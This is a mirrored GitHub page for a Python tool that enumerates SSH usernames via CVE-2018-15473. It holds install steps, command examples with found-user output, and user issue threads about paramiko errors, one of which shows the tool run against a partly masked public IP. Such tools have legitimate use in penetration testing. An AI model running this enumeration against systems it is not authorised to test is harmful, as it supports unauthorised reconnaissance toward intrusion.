epi052 / cve-2018-15473 Goto Github PK

Multi-threaded, IPv6 aware, wordlists/single-user username enumeration via CVE-2018-15473

License: Other

Python 100.00%

cve-2018-15473's Introduction

CVE-2018-15473

OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.

Install

You may need to install your distro's equivalent openssl-dev package

# NOTE: if you're installing on kali, you can skip the pip install; paramiko is already there.  

git clone https://gitlab.com/epi052/cve-2018-15473.git
cd cve-2018-15473
pip install -r requirements.txt 
# - OR - 
pipenv install -r requirements.txt  # if you're cool like that   
chmod u+x ssh-username-enum.py

Examples

A single username

(cve-2018-15473)─> ./ssh-username-enum.py -u epi 192.168.1.2
[+] epi found!

Use a wordlist with 10 threads (the default is 4)

(cve-2018-15473)─> ./ssh-username-enum.py -t 10 -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt 192.168.1.2
[+] avahi found!
[+] avahi-autoipd found!
[+] backup found!
[+] daemon found!
[+] bin found!
------8<------

IPv6 Address on port 2222 and INCREASED VERBOSITY!

(cve-2018-15473)─> ./ssh-username-enum.py -6 -p 2222 -v -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt '::1'
[-] 4Dgifts not found
[-] demo not found
[-] checkfs not found
[-] anon not found
[-] EZsetup not found
[-] auditor not found
[-] demos not found
[-] OutOfBox not found
[-] checkfsys not found
[+] avahi found!
[-] diag not found
[-] ROOT not found
[-] checksys not found
[-] cmwlogin not found
[+] avahi-autoipd found!
------8<------

cve-2018-15473's People

Contributors

Stargazers

Watchers

cve-2018-15473's Issues

Error

fixer@fixer:~/SALAT/cve-2018-15473$ ./ssh-username-enum.py -u epi 80.93.26.***
[+] OpenSSH version 7.4 found
Traceback (most recent call last):
File "/home/fixer/SALAT/cve-2018-15473/./ssh-username-enum.py", line 203, in
main(**vars(args))
File "/home/fixer/SALAT/cve-2018-15473/./ssh-username-enum.py", line 172, in main
apply_monkey_patch()
File "/home/fixer/SALAT/cve-2018-15473/./ssh-username-enum.py", line 85, in apply_monkey_patch
old_msg_service_accept = auth_handler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT]
TypeError: 'property' object is not subscriptable
How to fix it?

Don't waste time on this

The code is no longer valid, seems like modules have been updated without testing.

Fixed the issue in my fork

AFAIK the issue is fixed in my fork here https://github.com/aidan-gibson/cve-2018-15473

All I did was change paramiko from 2.4.1 to 2.3.3

Small problem

The tool run correctly but I created a random wordlist and it says for all "found".
It can be also maybe a problem with the server...
I know the service is vulnerable because I found the vuln with nmap scan with --script vuln.

└─$ python3 ssh-username-enum.py -v -u jzoeifjoiejfoizejfoziefojzi server_adress
[+] OpenSSH version 7.4 found
[+] jzoeifjoiejfoizejfoziefojzi found!

Xprogrammer777

'AuthHandler' has no attribute '_client_handler_table'

pip3 install -r requirements.txt

Requirement already satisfied: asn1crypto==0.24.0 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 1)) (0.24.0)
Requirement already satisfied: bcrypt==3.1.4 in /usr/local/lib/python3.7/dist-packages (from -r requirements.txt (line 2)) (3.1.4)
Requirement already satisfied: cffi==1.11.5 in /usr/local/lib/python3.7/dist-packages (from -r requirements.txt (line 3)) (1.11.5)
Requirement already satisfied: cryptography==2.3.1 in /usr/local/lib/python3.7/dist-packages (from -r requirements.txt (line 4)) (2.3.1)
Requirement already satisfied: idna==2.7 in /usr/local/lib/python3.7/dist-packages (from -r requirements.txt (line 5)) (2.7)
Collecting paramiko==2.4.1
Using cached paramiko-2.4.1-py2.py3-none-any.whl (194 kB)
Requirement already satisfied: pyasn1==0.4.4 in /usr/local/lib/python3.7/dist-packages (from -r requirements.txt (line 7)) (0.4.4)
Requirement already satisfied: pycparser==2.18 in /usr/local/lib/python3.7/dist-packages (from -r requirements.txt (line 8)) (2.18)
Requirement already satisfied: PyNaCl==1.2.1 in /usr/local/lib/python3.7/dist-packages (from -r requirements.txt (line 9)) (1.2.1)
Requirement already satisfied: six==1.11.0 in /usr/local/lib/python3.7/dist-packages (from -r requirements.txt (line 10)) (1.11.0)
Installing collected packages: paramiko
Attempting uninstall: paramiko
Found existing installation: paramiko 2.0.8
Uninstalling paramiko-2.0.8:
Successfully uninstalled paramiko-2.0.8
Successfully installed paramiko-2.4.1

python3 ssh-username-enum.py -p 22 -u root

[+] OpenSSH version 7.2 found
Traceback (most recent call last):
File "ssh-username-enum.py", line 203, in
main(**vars(args))
File "ssh-username-enum.py", line 172, in main
apply_monkey_patch()
File "ssh-username-enum.py", line 85, in apply_monkey_patch
old_msg_service_accept = auth_handler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT]
AttributeError: type object 'AuthHandler' has no attribute '_client_handler_table'

not running

File "/home/bunter/cve-2018-15473/ssh-username-enum.py", line 27, in import paramiko ModuleNotFoundError: No module named 'paramiko'

Blowfish has been deprecated

/usr/lib/python3/dist-packages/paramiko/transport.py:236: CryptographyDeprecationWarning: Blowfish has been deprecated
"class": algorithms.Blowfish,